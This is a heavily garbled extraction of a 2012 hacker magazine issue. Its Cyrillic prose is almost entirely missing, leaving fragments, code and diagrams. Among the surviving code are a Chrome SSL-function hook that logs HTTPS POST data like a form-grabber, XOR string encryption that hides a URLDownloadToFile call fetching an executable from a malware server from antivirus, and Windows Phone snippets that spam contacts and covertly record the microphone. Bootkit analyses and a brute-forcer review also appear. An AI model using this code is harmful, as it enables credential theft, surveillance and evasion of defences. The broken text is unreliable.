Z.Razor (ZerveRTeam).
URL:
www.zerverteam.com.
:
Windows.
:
Marcello Pietrelli &
Gianni Baini.
URL:
bit.ly/ukWQSX.
:
Windows.
;
;
;
;
(
) - viagra.
com, -
. ,
-
xakepviagra.com: [a-z]{5,5}viagra.com.
!
:
. .
URL:
z-oleg.com/secur/aps.
:
Windows.
WEB TOOL
FILES TERMINATOR
APS !
Web Tool ,
GET- POST-.
,
/// //- . .
(
Data UserAgent)
:
,
. Files Terminator.
,
, ,
.
, , . ,
,
,
.
:
1. .
2. , HMG IS5.
3. .
4. , P50739-95.
5. , DoD
5220.22-M(E).
6. , VSITR.
7. , RCPM TSSIT OPS-II.
8. .
9. .
#user# ,
#pass# ,
#md5(user)# md5,
#md5(pass)# md5,
#token1# #token(1-X)# ,
#count# .
, , .
(,
, X )
(
< ).
:
1. source-:
nick;pass .
2. : , .
3. :
.
03 /158/ 2012
075
MALWARE
2011
. , :
,
,
.
Load MBR
read mode
Load VBR
read mode
load malicious
MBR/VBR
Load bootmgr
NT kernel
modifications
Load winload.exe
or winresume.exe
read mode/protected mode
load rootkit
driver
. 1.
076
. 2.
03 /158/ 2012
. 3. VBR
MBR Code
MBR Code
MBR Data
MBR Data
Bootmgr Partition
Bootmgr Partition
OS Partition
OS Partition
Unpartitioned Space
Olmasco Partition
Before infecting
After infecting
. 4. Olmasco
64- . 2010
64- Win64/Olmarik
(TDL4), Rovnix,
ZeroAccess (update), TDL4 (update), Carberp, Olmasco ( MaxSS). ,
03 /158/ 2012
. , . 1.
PoC-,
.
(MBR) ,
, -
077
MALWARE
. 5. Olmasco
. 6. Olmasco
,
.
. - - ,
.
Stuxnet,
Duqu ( Stuxnet). , ,
,
Stuxnet (, , :)).
Duqu .
, ,
0-day- CVE-2011-3402
,
;).
078
--! !
, Olmasco.
, VBR
(Volume Boot Record)
. VBR
, . 3.
,
MBR. , , .
, . .
,
(. 4).
.
03 /158/ 2012
,
.
. 5.
- . 6.
, IDA Hex-Rays
.
.
. 7.
, Olmasco, TDL4,
-, kdcom.dll.
WinDbg,
. :
(
),
kdcom.dll .
- - ,
Bochs
IDA Pro.
, Olmasco ,
TDL4
.
Call
KdDebuggerInitialize1
from loaded kdcom.dll
Load VBR of
malicious partition
Load ntoskrnl.exe,
hal.dll, kdcom.dll,
bootvid.dll ant etc
Load winload.exe
. 8. !
Substitute EmsEnabled
option with Winpe
Read bcd
. 7. Olmasco
03 /158/ 2012
--! !
Carberp, -.
Carberp ,
.
, .
- Win64/Rovnix,
. Carberp Rovnix -,
.
Carberp ,
.
Continue kernel
initialization
Loal MBR
. 9. Carberp
079
MALWARE
. 10. , - Carberp
(. 9).
, .
, . ,
. (
), ,
, .
:
080
. 11. Carberp
, , . 10.
-
(. 11).
, .
-
.
user-mode-.
, NtQueueApcThread()/NtResumeThread().
Carberp : -, , dll-,
. , , .
. ,
GMER RKU.
Carberp ,
03 /158/ 2012
success
Check if
already
infected
Loal MBR
fail
Real mode
Check OS
Version
Win 2000
Load VBR
Real mode
Win XP
Vista/Win7
success
Target of Win64\Rovnix
Check Admin
Privileges
fail
Determine OS
Digit Capacity
Load bootmgr
real mode / protected mod
Install Corresponding
Kernel mode Driver
Call ShellExecuteEx
API with runas
Load winload.exe or
winresume.exe
Overwrite Bootstrap
Code of Active Partition
. 12. Rovnix
,
x86-, x64-. 2012 , ,
.
!
- Rovnix,
, MBR.
. 12.
-, , Bootstrap-, .
Bootstrap ,
VBR (Volume Boot Record), bootmgr.
. Rovnix, Olmasco,
-, ,
Olmasco, ,
, , , , - .
,
,
.
03 /158/ 2012
. 13. Rovnix
, Rovnix , , MBR. , ,
, . ,
.
, SecureBoot Win8,
.
-
,
- .
,
. ,
,
-, ,
,
, . , , , . z
081
MALWARE
yurembo (yazevsoft@gmail.com)
- ,
, . ,
, MS WM6.5,
,
. !
082
INFO
MediaElement
(
mediaSound),
XAML-
: <MediaElement Height="120"
Name="mediaSound"
Width="160" />.
WWW
windowsphonehacker.com
,
WP
77.5.
CD
,
.
03 /158/ 2012
WINDOWS PHONE
, , . :)
, WP 7,
Windows
Phone Marketplace 99 . ChevronTeam ChevronWP7,
.
, .
WP 7, Mango MS WP 7.5,
, ChevronTeam . ,
. , ,
, . , ! :)
. ,
.
, ,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB,
ZuneDriver, Device
.
, WP (
MS ;)), , -,
, .
WP .NET Silverlight.
,
API. SMS
.
!
, :
using System.Windows.Navigation;
, Microsoft.Phone.
Tasks, SMS (. ). , :
protected override void OnNavigatedTo(NavigationEventArgs e)
{
SmsComposeTask msgSMS = new SmsComposeTask();
msgSMS.Body = " -";
WINDOWS PHONE
, Microsoft .
1. (
.NET Compact), , ()
.
2.
(chamber).
3.
,
, ,
.
03 /158/ 2012
4. . ( ,
, ,
,
?
.)
5.
Windows Phone Marketplace.
6. SSL. ,
, .
7.
ProtectedData ( -
System.Security.Cryptography),
.
8. WP 7 : AES, HMACSHA1,
HMACSHA256, Rfc2898DeriveBytes, RSA,
SHA1, SHA256.
9. , IE,
.
10. , Microsoft,
.
083
MALWARE
msgSMS.To = "1928";
msgSMS.Show();
}
;
.
:)
, ,
:).
, WP 7.5
.
, ,
, . ,
.
. WP- (
, 7.5, SDK
7.1) Silverlight, C#-
Microsoft.Phone.UserData,
.
. , ,
Contacts,
. MainPage InitSearch,
contacts.SearchAsync(String.Empty, FilterKind.DisplayName, null)
.
SearchAsync : (
, ); , ( , ,
None, , ); ,
, null. -
Windows Phone
:
1.
( hash-: = ).
2. .
3. ,
LINQ, / .
,
,
.
ContactsSearchEventArgs.,
SearchCompleted,
MainPage:
contacts.SearchCompleted += new EventHandler<
ContactsSearchEventArgs>(contacts_SearchCompleted)
:
void contacts_SearchCompleted(object sender,
ContactsSearchEventArgs e)
{
int max = e.Results.Count(); //-
string adr;
try { //
for (int i = 0; i < max; i++)
if (e.Results.ElementAt(i).EmailAddresses != null)
{
adr = e.Results.ElementAt(i).
EmailAddresses.First().EmailAddress; //
if (adr != null && adr != "") //
SendEmail(adr); // :)
}
}
catch (Exception ex) { }
}
,
, e-mail- ( ) , ,
SendEmail, .
:
void SendEmail(String adr)
{
EmailComposeTask email = new EmailComposeTask();
email.To = adr;
email.Subject = "Holy mail";
email.Body = "Download my prog";
email.Show();
}
,
( EmailSender).
Overhear2
084
03 /158/ 2012
,
- .
, .
, . ,
! ;)
, , , ,
.
,
(Overhear2, ),
, .
,
Silverlight- WP. C#-
:
using
using
using
using
using
System.IO;
Microsoft.Xna.Framework;
Microsoft.Xna.Framework.Audio;
System.Windows.Threading;
System.IO.IsolatedStorage;
, FrameworkDispatcher ( , ), , , ,
(
, ),
. MainPage (.
). ,
. ,
Windows Phone
, :).
, .
, . (
) .
,
, . recordingStopped ,
, , ,
( ), .
DispatcherTimer .
xna.
xna, :
DispatcherTimer dt = new DispatcherTimer();
dt.Interval = TimeSpan.FromMilliseconds(33);
, ,
: dt.Tick += new EventHandler(dt_Tick).
dt.Start() .
, ,
. ,
(, 10 000 ),
, .
,
SetupMicrophone. ,
. - ,
, , .
,
.
. , . WriteWavHeader ,
. , microphone.Start()
.
.
,
33 . ,
. , ,
recordingStopped .
,
.
( 500 ) microphone_BufferReady.
. recordingStopped , , ,
.
, : , ?
, ,
, .
, , ,
.
SaveFile() (. ), ,
.
private void SaveFile() { //
, ,
()
.
,
.
03 /158/ 2012
,
(dormant), ,
.
(active -> dormant)
tombstoning.
, (terminate)
. ,
:
Launching , Closing
, Deactivating (
) Activating
tombstone. ,
, .
085
MALWARE
using (IsolatedStorageFile isoStorage =
IsolatedStorageFile.GetUserStoreForApplication()){
using (IsolatedStorageFileStream isoStream =
isoStorage.CreateFile(FileName)) {
isoStream.Write(stream.ToArray(), 0,
stream.ToArray().Length);
}
}
}
, ,
.
,
. , wav-.
, :). wav-,
. (goo.gl/ufe3y)
, (
). !
WriteWavHeader,
, ( SetupMicrophone), UpdateWavHeader,
,
, , (
microphone_BufferReady, ,
SaveFile).
wav-. ,
microphone_BufferReady (
recordingStopped), PlayFile
.
:
private void PlayFile() { //
using (var isf =
IsolatedStorageFile.GetUserStoreForApplication()) {
if (isf.FileExists(FileName)) {
using (var isoStream = isf.OpenFile(FileName,
FileMode.Open, FileAccess.Read)) {
mediaSound.Stop();
mediaSound.SetSource(isoStream);
mediaSound.Position=System.TimeSpan.FromSeconds(0);
mediaSound.Volume = 20;
mediaSound.Play();
}
}
}
}
Overhear
,
.
mediaSound.
,
, .
,
.
: , , ( )
( ). Play :
sound = new SoundEffect(stream.ToArray(),
microphone.SampleRate, AudioChannels.Mono);
sound.Play();
! , : , Windows Phone
, . !
WP 7 .
, ,
. :
1. The Trusted Computing Base (TCB)
.
, - , .
086
, ,
,
Windows Phone Marketplace,
.
2. The Elevated Rights Chamber (ERC) .
,
, ,
.
.
3. The Standard Rights Chamber (SRC)
, MS Office
Mobile, Internet Explorer 9 . .
4. The Least Privileged Chamber (LPC) ,
Microsoft.
, .
03 /158/ 2012
Preview
088
GOOGLE CHROME
,
.
Internet Explorer Mozilla Firefox
.
Google Chrome
, , . -,
,
,
.
094
,
. Python!
UNIXOID
108
Fedora
.
?
SYN\ACK
114
DLP-. - .
03 /158/ 2012
110
Linux-,
.
FERRUM
124
Django-
? .
130
!
. ,
.
087
(seserega@gmail.ru, blotlore.blogspot.com)
Google Chrome
GOOGLE
WWW
goo.gl/Cj4Pl
OllyDbg
.
goo.gl/rdAfo
,
IDA.
goo.gl/uIqMb
,
Chrome.
goo.gl/sZWwZ
.
INFO
__declspec(naked),
.
,
. Internet
Explorer Mozilla Firefox
.
Google Chrome ,
.
088
03 /158/ 2012
Google Chrome
. 1. OllyDbg
, ,
. IE , HttpSendRequest,
wininet.dll, Firefox PR_Write nspr4.dll, ,
.
. 2. SSL-
SRV*c:\code\symbols*http://msdl.microsoft.com/download/
symbols;SRV*c:\code\symbols*http://chromium-browsersymsrv.commondatastorage.googleapis.com
03 /158/ 2012
4.
5.
6.
7.
c:\code\symbols ,
.
View.
Command, Registers Disassembly.
Chrome.
File Attach to a Process...
chrome.exe .
x chrome*!* SSLClientSocketNSS::Write
( Command)
SSLClientSocketNSS::Write, SSLClientSocketWin::Write. (breakpoints) Gmail-.
SSLClientSocketNSS
::Write.
,
int SSLClientSocketNSS::Write(
IOBuffer* buf,
int buf_len,
const CompletionCallback& callback
)
,
POST-. ,
IOBuffer:
class NET_EXPORT IOBuffer :
public base::RefCountedThreadSafe<IOBuffer>
{
public:
IOBuffer();
explicit IOBuffer(int buffer_size);
char* data() { return data_; }
protected:
friend class base::RefCountedThreadSafe<IOBuffer>;
explicit IOBuffer(char* data);
virtual ~IOBuffer();
char* data_;
};
, -
089
. 3. SSL-
,
. OllyDbg
SSLClientSocketNSS::Write (. 1),
DWORD (. 2).
, DWORD ( IOBuffer+8) (char*),
HTTPS- (. 3).
, POST , . ,
SSLClientSocketNSS::Write (. 4).
POST , .
.
,
, .
, ,
, , GetProcAddress
.
PE-, , chrome.exe
chrome.dll. ,
SSLClientSocketNSS::Write dll.
, .
090
- .
. (
, )
14 , chrome.dll .
chrome_1c30000!net::SSLClientSocketNSS::Write:
02875a4c 55
push
ebp
02875a4d 8bec
mov
ebp,esp
02875a4f 51
push
ecx
02875a50 53
push
ebx
02875a51 56
push
esi
02875a52 57
push
edi
02875a53 ff7508
push
dword ptr [ebp+8]
02875a56 8bf1
mov
esi,ecx
02875a58 33db
xor
ebx,ebx
(BYTE*),
, . ,
. ?, x.
03 /158/ 2012
Google Chrome
if(DataCompare((BYTE*)(dwAddress+ i),pbMask,szMask))
return (DWORD)( dwAddress + i );
}
return 0;
}
- , is f*cking unstable.
, , .
. 4. SSLClientSocketNSS::Write
:
char* Sign = "\x55\x8B\xEC\x51\x53\x56\x57\xFF\x75\x08
\x8B\xF1\x33\xDB"; // SSLClientSocketNSS::Write
char* Mask="xxxxxxxxxxxxxx"; //
DWORD SSLAdr = FindPattern(ChromeDLL,
Chrome32Size,
(BYTE*)Sign,
Mask); // SSLAdr - SSLClientSocketNSS::Write
:
bool DataCompare( const BYTE* pData,
const BYTE* bMask, const char* szMask )
{
for( ; *szMask; ++szMask, ++pData, ++bMask )
{
if( *szMask == 'x' && *pData != *bMask )
return false;
}
return ( *szMask ) == NULL;
}
DWORD FindPattern ( DWORD dwAddress,
DWORD dwSize, BYTE* pbMask, char* szMask )
{
for( DWORD i = NULL; i < dwSize; i++ )
{
K, , .
. , , ,
. , , 5 JMP _.
5 ,
JMP. . ,
, , .
. ,
JMP , .
.
.
PAGE_EXECUTE ( VirtualProtect),
5 ( )
. 5 ,
asm- ,
. ,
, -
.
, JMP, [ +
]. ,
JMP _.
,
,
( ).
-, ,
:
. ,
openws akademiker
PR_Write ( - ),
Chrome
Zeus ( , ).
PR_Write
//
char* Sign = "\x8b\x4c\x24\x04\x57\xe8\x00\x00\x00\x00\x8b
\xf8\x85\xff\x75\x05\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xb7
\x38\x02\x00\x00";
//
char* Mask="xxxxxx????xxxxxxxxxxxxxxxxxxx";
03 /158/ 2012
, PR_Write
, combined_
methods, ,
WinDBG SSLClientSocketNSS::DoPayload
Write (. 5).
,
. ,
combined_methods PR_Write
OCh . SpyEye
, .
TranslateMessage, ,
, ZwReadFile,
(
goo.gl/xTX9j). , .
091
. 5. Combined_methods SSLClientSocketNSS::DoPayloadWrite
WriteLog(LogFile,*(char**)(buf+8));
IsPostData=true;
}
else if ((strncmp((LPCSTR)*(char**)(buf+8),
"GET", lstrlen("GET"))==0)|| IsPostData)
{
WriteLog(LogFile,*(char**)(buf+8));
IsPostData=false;
}
__asm
{
push ebp;
mov ebp,esp;
push ebx;
push esi;
push edi;
push ecx;//argument
}
//
//
ChromeHook.UnsetSplicing();
TrueSSLWrite = (SSLWrite)ChromeHook.GetHookedFunc();
//
__asm
{
pop ecx;//argument
mov eax,callback;
push eax;
mov eax,buf_len;
push eax;
mov eax,buf;
push eax;
call TrueSSLWrite;
push eax;
}
//
ChromeHook.ReSplice();
if((strncmp((LPCSTR)*(char**)(buf+8),
"POST",lstrlen("POST"))==0))
{
092
__asm
{
pop eax;
pop edi;
pop esi;
pop ebx;
leave;
ret 0Ch;
}
}
__declspec(naked) , ,
ex. , ,
, .
thiscall,
(
Write SSLClientSocketNSS). ecx
,
.
-
( DLL-) !
Google Chrome , ,
.
. , ,
. . z
03 /158/ 2012
>> coding
/++
( )
,
.
, ,
, .
.
WWW
Cog
:
nedbatchelder.com/
code/cog.
INFO
094
,
python-
cog.
.
,
.
? , , ? , ():
URLDownloadToFile(NULL, "http://malwareserver.com/test.exe",
"C:\\test.exe", 0, NULL);
,
URLDownloadToFile,
.rdata .data . hex- . , ,
, - :
URLDownloadToFile(
NULL,
Decrypt("\x0E\x12\x12\x16\x5C ..."),
Decrypt("\x25\x5C\x3A\x12\x03 ..."),
0,
NULL);
,
. - , ,
, .
,
, . (
), - .
PYTHON
, , , -
Cog (http://pypi.python.org/pypi/cogapp).
,
. , , Cog
,
,
. , Cog :
// ++
...
/*[[[cog
03 /158/ 2012
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
//[[[end]]]
...
:
// ++
...
/*[[[cog
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
void DoSomething();
void DoAnotherThing();
void DoLastThing();
//[[[end]]]
...
, Visual
Studio , . ,
Encrypt cog-, .
BIN2H
[[[cog ]]] ,
,
]]] [[[end]]]. Cog ,
,
.
, , ,
. ,
.
out outl ( out, ) cog.
,
python-. ,
.
. Cog
xor:
/*[[[cog
import cog
key = 0x66
def Encrypt(str):
cog.out('Decrypt("')
cog.out("".join(['\\' + ("0x%02X" % (ord(char)^key))
for char in str]))
cog.out('")')
]]]
[[[end]]]*/
URLDownloadToFile Encrypt:
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
/*[[[end]]]*/,
0,
NULL);
03 /158/ 2012
, . , Cog
bin2h . bin2h
, , :
def bin2h(filename, valuename):
data = open(filename, 'rb').read()
cog.outl('BYTE %s[] = {' % valuename)
for byte in data:
cog.out('0x%02X, ' % ord(byte))
cog.outl('}')
cog.outl('DWORD %s_size = %d;' % (valuename, len(data)))
, (
PE-), :
//[[[cog bin2h("test.bin", "test")]]]
/*[[[end]]]*/
:
//[[[cog bin2h("test.bin", "test")]]]
BYTE test[] = {
0x23, 0x69, 0x6E, 0x63, 0x6C ...
//
}
DWORD test_size = 7079;
/*[[[end]]]*/,
bin2h
.
, ,
.
, , API . c CorePy
, -
. z
095
(ivinside.blogspot.com)
,
.
, .
-.
40
...
096
, .
- . :
, .
, .
?
... !
... ? .
?
, ,
-- .
!
, .
, . ... ( )
!
?
03 /158/ 2012
, ,
, , --
. : . :) .
13:
, .
, ,
. , , ,
, , .
.
. ,
?
1
1
1
1
1
1
2
2
2
2
3
3
3
4
*
*
*
*
*
*
*
*
*
*
*
*
*
*
1
2
3
4
5
6
2
3
4
5
3
4
5
4
*
*
*
*
*
*
*
*
*
*
*
*
*
*
11 = 11
10 = 20
9 = 27
8 = 32
7 = 35
6 = 36
9 = 36
8 = 48
7 = 56
6 = 60
7 = 63
6 = 72
5 = 75
5 = 80
, . ,
: 1*6*6 2*2*9. ,
, 36,
, ,
. ,
, , ,
. : ,
.
, .
, , .
(1-6-6 2-2-9) .
, , .
( ). :
,
Python.
Oracle.
cx_Oracle,
Oracle.
, ,
:
, ;
, ;
,
.
, , .
, :
,
;
,
.
,
, . ,
:
1.
2.
, ,
, .
Oracle
. , , .
.
test1 test2,
( )
- :
CREATE TABLE test1(prod VARCHAR(10), price INT);
CREATE TABLE test2(prod VARCHAR(10), price INT);
import cx_Oracle
#
conn = cx_Oracle.connect('system/qwerty@XE')
cur = conn.cursor()
#
for line in open('file.txt'):
cur.execute("INSERT INTO test VALUES (:s)", s=line)
# ,
cur.execute('COMMIT')
cur.close()
,
, .
.
03 /158/ 2012
JOIN,
.
LEFT JOIN ,
(), ,
().
. ,
.
WHERE test3.prod IS NULL, , , .
:
SELECT test1.* FROM test1 LEFT JOIN test3
ON test1.prod=test2.prod AND test1.price=test2.price
WHERE test2.prod IS NULL;
,
JOIN, , ,
, -
097
1. ,
,
, None,
.
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}
. .
,
. ,
, ,
. .
, - .
:
. ,
.
, .
2. :
def myappend(a = [], num = 0):
a.append(num)
print a
,
:
>>>
>>>
>>>
>>>
>>>
>>>
>>>
a = [1,2,3]
myappend(a)
myappend()
myappend()
a = {1:2, 3:4}
myappend(*a)
myappend(**a)
3. , .
>>> a =
>>> b =
>>> for
<Keeper
Keeper()
Keeper()
i in Keeper.list_instances(): print i
instance at 0x...
4. ?
389/tcp
open
ldap
, .
, *nix,
, chkrootkit.
, , . Chkrootkit
,
.
rkhunter unhide.
, .
http://goo.gl/9HXEt.
GMER RootRepeal.
, , - ,
.
(IDS intrusion detection system).
. ,
.
Snort
Suricata. , , .
- -
(WAF web application firewall),
.
,
.
,
. , .
.
, . ?
, ,
, .
( ,
. .), .
, ,
,
, .
, : l = 2 * pi * R,
R . ,
. R,
l/2, pi * R.
, , ,
3,14 , , , ,
. , .
, , - ! ,
: , ?
,
: , .
:
3 + 5 = 8
5 + 7 = 12
7 + 11 = 18
...
, ,
,
, .
,
098
03 /158/ 2012
, , .
, . ,
,
( , r < 3/pi * R/4) ,
. ,
. ,
R/4 , . , ,
l/2, 12,56 (2 * 3,14 * 4/2). ,
, ,
, !
r < 3/pi * R/4 , ,
.
!
P. S. :
1. ?
2.
?
c , URL (
URL), N . N, , 10.
.
threading,
eventlet, gevent, Twisted .
# URL
urlsPool = Queue.Queue(0)
# URL'
for url in open(sys.argv[-1], 'r'):
urlsPool.put(url)
#
for x in xrange(threads):
DownloadThread().start()
urlsFile.close()
.
, .
. , .
, , . ( ,
):
1. (, ).
2. , .
3. .
4.
.
: , ,
(). . .
, , .
threading:
import
import
import
import
sys
threading
Queue
urllib2
# ,
class DownloadThread(threading.Thread):
def run(self):
#
headers = {'User-Agent' :
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'}
while urlsPool.qsize() > 0:
logfile = open(str(urlsPool.qsize()), 'w')
#
req = urllib2.Request(urlsPool.get(),None,headers)
#
logfile.write(urllib2.urlopen(req).read())
logfile.close()
# ,
if len(sys.argv) < 2:
print 'Usage: downloader.py [-n <number>] FILE\n\
"-n <number>" - number of threads (default 10)'
sys.exit(1)
#
if len(sys.argv) == 4 and sys.argv[1] == '-n':
threads = int(sys.argv[2])
else:
threads = 10
03 /158/ 2012
, .
,
. :
? .
100 . :
I : 900
II : 1000 + 100
:
I : 900 + 100
II : 1000 + 100 100
, 10 1
100/11 1000/11 . ( ):
I : (900 + 100/11) + 1000/11
II : (1000 1000/11) + (100 10/11)
:
I : 909,09 + 90,91
II : 909,09 + 90,91
, !
: ,
, ,
. z
099
deeonis (deeonis@gmail.com)
.
,
.
.
, ,
.
100
,
, . HTML-
,
. ,
, -, -
. , , HTML-
.
, .
, . , HTML-
. , - ,
. ,
, . ,
-, ,
.
, , - , ,
,
. -
03 /158/ 2012
. ,
. ,
, , -
.
, .
( HTML)
//
class IHTMLParser
{
// ...
char* getTags() = 0;
// ...
}
// ,
class HTMLParser : public IHTMLParser
{
// ...
char* getTags() {
//
};
// ...
}
//
IHTMLParser *parser = new HTMLParser();
parser->getTags();
, .
HTMLParser, . , ,
.
ModernHTMLParser,
IHTMLParser. ,
, IHTMLParser, .
.
ModernHTMLParser
class ModernHTMLParser
{
// ...
std::vector<char*> getHtmlTags();
// ...
}
// , IHTMLParser
class HTMLAdapter (ModernHTMLParser &parser):
CLIENT
public IHTMLParser
{
private:
ModernHTMLParser &m_modernParser;
public:
HTMLAdapter(ModernHTMLParser &parser)
{
m_modernParser = parser;
}
char* getTags() {
// ...
m_modernParser.getHtmlTags();
// ...
};
// ...
}
//
ModernHTMLParser &modernParser = new ModernHTMLParser();
IHTMLParser *parser = new HTMLAdapter(modernParser);
parser->getTags();
.
, HTMLAdapter ModernHTMLParser.
,
, .
, . , , , getTags() HTMLParser HTML-,
, getHtmlTags()
ModernHTMLParser , ,
getTags HTMLAdapter .
class HTMLAdapter (ModernHTMLParser &parser):
public IHTMLParser
{
private:
ModernHTMLParser &m_modernParser;
public:
HTMLAdapter(ModernHTMLParser &parser)
{
m_modernParser = parser;
}
char* getTags() {
// ...
vectorOfTags = m_modernParser.getHtmlTags();
TARGET
+request()
ADAPTER
+request()
adaptee
ADAPTEE
specificReqest ()
03 /158/ 2012
101
//
return vector2array(vectorOfTags);
char* getTags() {
// , getHtmlTags(),
//
vectorOfTags = getHtmlTags();
//
return vector2array(vectorOfTags);
};
// ...
};
// ...
}
, , , , .
,
-
. ,
,
.
,
.
. ,
,
.
class HTMLAdapter ():
public HTMLParser, public ModernHTMLParser
{
public:
, ,
HTMLParser, .
HTMLAdapter
, , ,
HTMLParser. , HTMLParser2,
IHTMLParser,
.
, ,
-
.
. ,
.
class SystemClass1
{
void methodA();
// ...
}
class SystemClass2
{
void methodB();
// ...
}
class SystemClass3
{
void methodC();
// ...
}
class Facade (SystemClass1 &sc1,
SystemClass2 &sc2, SystemClass3 &sc3)
{
private:
SystemClass1 &m_sc1;
SystemClass2 &m_sc2;
SystemClass3 &m_sc3;
public:
Facade(SystemClass1 &sc1,
SystemClass2 &sc2, SystemClass3 &sc3)
{
m_sc1 = sc1;
m_sc2 = sc2;
m_sc3 = sc3;
}
C#
102
void method()
{
m_sc1.methodA();
03 /158/ 2012
SubsystemThree
SubsystemTwoWrapper
+primeTheDirective()
PlasmaConduit
Holodeck
WarpCore
JefferiesTube
DilithiumChamber
Transporter
TurboLift
PhaserBack
Weapon
PhotonTorpedo
m_sc2.methodB();
m_sc3.methodC();
}
}
Facade, HTMLAdapter, . ,
, .
,
. . .
HTMLParser , Facade
.
, , - .
, , , .
, , . .,
, -
03 /158/ 2012
.
, -
.
, .
,
, , . , ,
,
Facade, .
.
: .
.
- , ,
.
, . z
103
UNIXOID
(execbit.ru)
LINUX
,
,
,
.
, ,
, .
, ,
- .
, ,
.
,
,
104
INFO
TrueCrypt,
,
-
.
Haven
,
.
,
200 .
,
. ,
:
,
, .
. ,
/ .
. , -
, .
. ,
,
.
.
,
: Ubuntu Privacy Remix, Privatix, The
Haven Project, Tails Liberte Linux.
03 /158/ 2012
- , ,
,
. ,
,
grsecurity.
,
, , dmesg , root,
chroot-,
/proc,
.
grsecurity ( ,
2010
), .
grsecurity
PaX,
(, ),
.
Liberte Linux,
Hardened Gentoo,
.
SELinux AppArmor
(
, ).
, ( )
.
AppArmor quantOS, , ,
.
-
Liberte Linux
03 /158/ 2012
.
,
-
,
,
. QubesOS,
(
, ][_07_2010).
Liberte
. ,
, ,
.
LiveCD, ,
, RAM-,
. , , ,
.
TrueCrypt LUKS/dm-crypt,
.
,
Ubuntu, Fedora
. Tails (The Amnesiac Incognito Live
System) Liberte Linux,
, .
,
,
.
.
TrueCrypt
. , Haven (www.haven-project.org).
. Privatix
UsbCryptFormat
CryptBackup
.
Ubuntu Privacy
Remix (www.privacy-cd.org),
,
( LAN/WLAN/Bluetooth
). -
GnuPG, Nautilus
,
( Haven
Seahorse).
TrueCrypt-
( )
, (,
, OpenOffice, GnuPG
. .).
- .
,
,
. , Tails MAT (mat.boum.org),
(, . .),
. Haven , ,
,
(
105
UNIXOID
).
Nautilus,
, ,
.
,
.
.
,
. , Ubuntu Privacy Remix
,
Bluetooth -.
Linux, ,
.
,
.
Tor,
,
.
Tor
,
. , Tor
,
?
Tails Haven
: Tor-,
. Liberte
Linux , , ,
,
IP-
106
Haven OS
.
Liberte Linux
:
Tor
(, , torify),
.
IP-,
Tor.
:
DHCP- Tor- HTTP(S)-;
ping ;
VPN-;
, ,
.
DHCP
, ,
ARP IPv4LL .
Wi-Fi, MAC.
, Liberte Linux
MAC-
.
,
: Gnome,
LXDE Fluxbox, Firefox, claws-mail, Abiword . .,
. - .
,
, ,
.
Tails,
, ,
. , -
Tor- Vidalia (www.torproject.org/
projects/vidalia), /
Tor-,
Tor ,
. .
Firefox,
-:
torbutton,
-
JavaScript-, Flash . .;
FireGPG (getfiregpg.org), gpg-
-, ,
;
HTTPS Everywhere (www.eff.org/
WINDOWS
Haven
,
Windows
.
100 ,
. Windows
,
,
, 100 .
,
.
03 /158/ 2012
https-everywhere),
HTTPS, .
Haven,
.
:
RefControl HTTP HTTP-referrer,
, ,
.
CookieSafe
.
AdBlock Plus .
RequestPolicy (
CSRF-).
Perspectives
SSL.
Aircrack-ng
Wi-Fi-
, (,
PWGen Tails). X-chat GPA
(GNU Privacy Assistant: gpa.wald.intevation.org),
SASL (ygrek.org.ua/p/cap_sasl.html)
Tor.
Liberte Linux Figaros Password
Manager 2 (ls.regnet.cz/fpm2/),
AES-256.
(Florence: florence.sf.net), ,
-
. , ,
,
, ,
Tor
03 /158/ 2012
Liberte: Tor
.
Hardened Gentoo,
.
, SSP (
) ASLR ( ).
, .
,
. Haven
,
. ,
, .
Tor, , ( NetworkManager)
Applications Start Network.
Haven
Tor browser bundle (
Firefox Tor) Windows.
(
)
(Application Haven Copy Windows
Tools), ,
. Haven
.
USB-,
Applications Haven
Haven Installer,
. ,
. , Haven
,
(
).
Liberte Linux
.
slock (tools.suckless.org/slock).
.
<Alt + Fx>,
.
Linux SysRq, X- .
Liberte
, .
,
,
iptables,
-.
. , ,
,
.
,
. Cold
boot, ,
/
,
.
, .
, .
-
. z
107
UNIXOID
hatchet
hatchet (maks.hatchet@yandex.ru)
-
FEDORA
Fedora
. Fedora 14
Systemd, Fedora 15 SETUID-
Capabilities,
GRUB2
HAL.
,
UNIX.
Fedora Gnome 3
SYSTEMD
SysV,
UNIX,
,
.
,
.
,
,
,
- , DoS-
.
, cut,
grep, awk . . ,
, .
108
, Systemd,
.
,
.
,
- .
Systemd Fedora 14
, /
. Fedora 16 (
).
CAPABILITIES VS SETUID
SETUID-
. - ping
, . ,
ping SETUID-, root, ,
(RAW) . ,
ping
, ,
ping,
ftp ,
root-.
? SELinux?
, ,
. ,
root, RAW-
?
. , Capabilities!
Capabilities? ,
SETUID, , , ,
03 /158/ 2012
,
Fedora,
,
UNIX. , /usr/bin,
, , /bin,
/sbin, /usr/sbin, /lib,
/usr/lib. , . , ,
, /bin, /sbin /lib
, , /usr (
NFS).
/usr
,
, , ,
/usr-
Systemd
Fedora btrfs
, , btrf-.
, ,
,
, ,
, , LSB
,
.
(
COW ),
-,
. Fedora 16 GRUB2,
(GRUB /
),
UNICODE .
HAL (Hardware
Abstraction Layer), udev udisks upower,
(
) .
HAL
.
Fedora 16 virt-sandbox, .
selinux-sandbox,
,
libvirt, LXC
QEMU/VirtualBox.
Trusted Boot,
, ,
, .
,
,
.
USB- ,
, , web .
Fedora 14 Spice QEMU.
: ,
,
. z
15- Fedora
firewalld, ,
.
D-BUS, .
firewall-cmd, ,
, IP-
:
$ firewall-cmd --enable --service=ssh
$ firewall-cmd --enable \
--service=samba --timeout=10
$ firewall-cmd --disable \
--service=ipp-client
Capabilities Linux
03 /158/ 2012
Fedora 15 CloudFS,
GlusterFS, . CloudFS
,
Linux-
.
Fedora 15 ,
:
((e)mbedded (m)otherboard)
em0,
em1, em2 . ., ,
PCI, pci1#2,
1 PCI-, 2 .
15- , Fedora btrfs
. Btrfs
109
